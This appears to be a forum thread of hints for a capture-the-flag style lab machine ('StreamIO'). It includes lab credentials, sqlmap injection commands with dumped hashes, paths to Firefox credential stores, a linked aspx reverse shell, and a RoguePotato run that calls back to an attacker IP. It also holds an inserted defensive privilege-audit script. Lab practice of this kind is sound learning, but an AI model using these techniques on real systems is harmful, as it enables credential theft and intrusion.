Posts: 12 Threads: 0 Joined: N/A

(June 5, 2022, 08:45 PM)jon01 Wrote:
(June 5, 2022, 08:27 PM)myzqlz Wrote:
https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r'
https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)'
https://slack.streamio.htb:b'yoshihide',b'paddpadd@12'
https://slack.streamio.htb:b'JDgodd',b'password@12'
crack C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\key4.db
try to crack with sharpweb: does not see anything
try https://github.com/lclevy/firepwd

Posts: 13 Threads: 0 Joined: N/A

(June 5, 2022, 08:49 PM)jon01 Wrote:
(June 5, 2022, 08:47 PM)myzqlz Wrote:
(June 5, 2022, 08:45 PM)jon01 Wrote:
(June 5, 2022, 08:27 PM)myzqlz Wrote:
https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r'
https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)'
https://slack.streamio.htb:b'yoshihide',b'paddpadd@12'
https://slack.streamio.htb:b'JDgodd',b'password@12'
crack C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\key4.db
try to crack with sharpweb: does not see anything
try https://github.com/lclevy/firepwd
btw how did u get slack vhost?
You can get the subdomain info in C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\logins.json. Then crack the passwords using https://github.com/lclevy/firepwd.
There's a 404 on slack, still have to fuzz around.
(June 5, 2022, 02:44 PM)dude4695 Wrote:
someone saying that we can use yoshihide user to privilege escalation (for administrator)
he gave me this hint saying that it is unintended way to do with web user yoshihide
Aspx + iis gives you more Hint aspx is different You can make one
i didn't get what he wants to say i used https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx this aspx shell didn't give me Administrator gave me same yoshihide user shell
When getting through the aspx shell as yoshihide, your user has additional privileges. The important one is SeImpersonatePrivilege, which points to a possible privesc route straight to system using RoguePotato

Posts: 74 Threads: 0 Joined: N/A

I am stuck as nikk37, dumped the creds from Firefox profile, but now what? Any hints?

Posts: 36 Threads: 0 Joined: N/A

(June 5, 2022, 11:10 PM)11231123 Wrote:
I am stuck as nikk37, dumped the creds from Firefox profile, but now what? Any hints?
I'm stuck here as well, I have no idea how to use those creds to log in, tried everything I could come up with

Posts: 24 Threads: 0 Joined: N/A

(June 5, 2022, 06:40 PM)Exa Wrote:
(June 5, 2022, 06:34 PM)Peter Wrote:
(June 4, 2022, 09:04 PM)dude4695 Wrote:
user = yoshihide pass = '66boysandgirls..'
How to crack the hash to that pass? I try rockyou, bruteforce and online services.
https://crackstation.net/
Thanks Exa, the first MD5 dump for me doesn't work. Something curious happened, to retrieve quick admin supposed with is_staff 1 then username and pass, but the pass don't match with user.....
sqlmap -u "https://streamIO.htb/login.php" --method POST --data "username=FUZZ&password=FUZZ" -D STREAMIO -T users -C id,is_staff,username,password --where "is_staff=1" -pivot-column id --dump --batch --force-pivoting
+----+----------+----------------------------------------------------+----------------------------------------------------+
| id | is_staff | password | username |
+----+----------+----------------------------------------------------+----------------------------------------------------+
| 9 | 1 | fd78db29173a5cf701bd69027cb9bf6b | yoshihide
wrong columns, the md5 is for other user. At now got it!
sqlmap -u "https://streamIO.htb/login.php" --method POST --data "username=FUZZ&password=FUZZ" -D STREAMIO -T users -C id,is_staff,password,username --where "id=31" -pivot-column id --dump --batch --force-pivoting
+----+----------+----------------------------------------------------+----------------------------------------------------+
| id | is_staff | password | username |
+----+----------+----------------------------------------------------+----------------------------------------------------+
| 31 | 1 | b779ba15cedfd22a023c4d8bcf5f2332 | yoshihide |

Posts: 40 Threads: 0 Joined: N/A

(June 5, 2022, 09:15 PM)floris Wrote:
(June 5, 2022, 08:49 PM)jon01 Wrote:
(June 5, 2022, 08:47 PM)myzqlz Wrote:
(June 5, 2022, 08:45 PM)jon01 Wrote:
(June 5, 2022, 08:27 PM)myzqlz Wrote:
https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r'
https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)'
https://slack.streamio.htb:b'yoshihide',b'paddpadd@12'
https://slack.streamio.htb:b'JDgodd',b'password@12'
crack C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\key4.db
try to crack with sharpweb: does not see anything
try https://github.com/lclevy/firepwd
btw how did u get slack vhost?
You can get the subdomain info in C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\logins.json. Then crack the passwords using https://github.com/lclevy/firepwd.
There's a 404 on slack, still have to fuzz around.
(June 5, 2022, 02:44 PM)dude4695 Wrote:
someone saying that we can use yoshihide user to privilege escalation (for administrator)
he gave me this hint saying that it is unintended way to do with web user yoshihide
Aspx + iis gives you more Hint aspx is different You can make one
i didn't get what he wants to say i used https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx this aspx shell didn't give me Administrator gave me same yoshihide user shell
When getting through the aspx shell as yoshihide, your user has additional privileges. The important one is SeImpersonatePrivilege, which points to a possible privesc route straight to system using RoguePotato
Is there a specific wordlist I need to use to fuzz the slack subdomain? I've tried a bunch of options fuzzing both as a dir and as an api but nothing so far.

Posts: 23 Threads: 0 Joined: N/A

(June 5, 2022, 09:15 PM)floris Wrote:
(June 5, 2022, 08:49 PM)jon01 Wrote:
(June 5, 2022, 08:47 PM)myzqlz Wrote:
(June 5, 2022, 08:45 PM)jon01 Wrote:
(June 5, 2022, 08:27 PM)myzqlz Wrote:
https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r'
https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)'
https://slack.streamio.htb:b'yoshihide',b'paddpadd@12'
https://slack.streamio.htb:b'JDgodd',b'password@12'
crack C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\key4.db
try to crack with sharpweb: does not see anything
try https://github.com/lclevy/firepwd
btw how did u get slack vhost?
You can get the subdomain info in C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\logins.json. Then crack the passwords using https://github.com/lclevy/firepwd.
There's a 404 on slack, still have to fuzz around.
(June 5, 2022, 02:44 PM)dude4695 Wrote:
someone saying that we can use yoshihide user to privilege escalation (for administrator)
he gave me this hint saying that it is unintended way to do with web user yoshihide
Aspx + iis gives you more Hint aspx is different You can make one
i didn't get what he wants to say i used https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx this aspx shell didn't give me Administrator gave me same yoshihide user shell
When getting through the aspx shell as yoshihide, your user has additional privileges. The important one is SeImpersonatePrivilege, which points to a possible privesc route straight to system using RoguePotato
I tried the RoguePotato method and didn't work for me.
PS C:\windows\temp> whoami /all

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

RoguePotato failed:
PS C:\windows\temp> . p.exe -r 10.10.x.x -e "cmd.exe /c ping -n 2 10.10.x.x" -l 9999
[+] Starting RoguePotato...
[*] Creating Rogue OXID resolver thread
[*] Creating Pipe Server thread..
[*] Creating TriggerDCOM thread...
[*] Listening on pipe \\.\pipe\RoguePotato\pipe\epmapper, waiting for client to connect
[*] Calling CoGetInstanceFromIStorage with CLSID:{4991d34b-80a1-4291-83b6-3328366b9097}
[*] Starting RogueOxidResolver RPC Server listening on port 9999 ...
[*] IStoragetrigger written:104 bytes
[-] Named pipe didn't received any connect request. Exiting ...
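
Added example, not part of any post in this thread: a Python sketch for the defender's side of the privilege listing above. It parses `whoami /priv`-style output, including the whitespace-collapsed form that pastes end up in, and reports what an account holds beyond a baseline; the baseline set and the function names are assumptions.

```python
import re

# Privileges that let the holder obtain or act under another account's token.
TOKEN_PRIVILEGES = {
    "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege",
    "SeDebugPrivilege",
    "SeTcbPrivilege",
}

# Assumed baseline for an unprivileged web-application identity (hypothetical).
BASELINE = {"SeChangeNotifyPrivilege", "SeIncreaseWorkingSetPrivilege"}

# One row: privilege name, free-text description, state. The lazy description
# group lets this work on aligned tables and on single-line pastes alike.
ROW = re.compile(r"\b(Se[A-Za-z]+Privilege)\s+(.+?)\s+(Enabled|Disabled)\b")

# Constructed sample: the rows quoted in the post above, collapsed to one line.
SAMPLE = (
    "Privilege Name Description State ===== ===== ===== "
    "SeMachineAccountPrivilege Add workstations to domain Disabled "
    "SeChangeNotifyPrivilege Bypass traverse checking Enabled "
    "SeImpersonatePrivilege Impersonate a client after authentication Enabled "
    "SeIncreaseWorkingSetPrivilege Increase a process working set Disabled"
)


def parse_privileges(text):
    """Return (name, description, state) tuples found in the listing."""
    return [m.groups() for m in ROW.finditer(text)]


def audit(text, baseline=BASELINE):
    """Report privileges outside the baseline as (severity, name, state).

    Disabled entries are reported too: the privilege is still present in the
    token and the process holding it can switch it on.
    """
    findings = []
    for name, _description, state in parse_privileges(text):
        if name in baseline:
            continue
        severity = "high" if name in TOKEN_PRIVILEGES else "review"
        findings.append((severity, name, state))
    return sorted(findings)


if __name__ == "__main__":
    for severity, name, state in audit(SAMPLE):
        print(f"{severity:6} {name} ({state})")
```
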
Posts: 213 Threads: 0 Joined: N/A

Running crackmapexec with the passwords from Firefox, there is a valid password for the JDgodd user.
I couldn't login with these credentials though.

Posts: 40 Threads: 0 Joined: N/A

(June 6, 2022, 06:56 AM)jon01 Wrote:
(June 6, 2022, 05:40 AM)Exa Wrote:
Running crackmapexec with the passwords from Firefox, there is a valid password for the JDgodd user.
I couldn't login with these credentials though.
try seeing in bloodhound
I am unable to use the attack vector that bloodhound shows. Add-DomainObjectAcl just hangs

Posts: 1 Threads: 0 Joined: N/A

https://streamio.htb/admin/master.php is accessible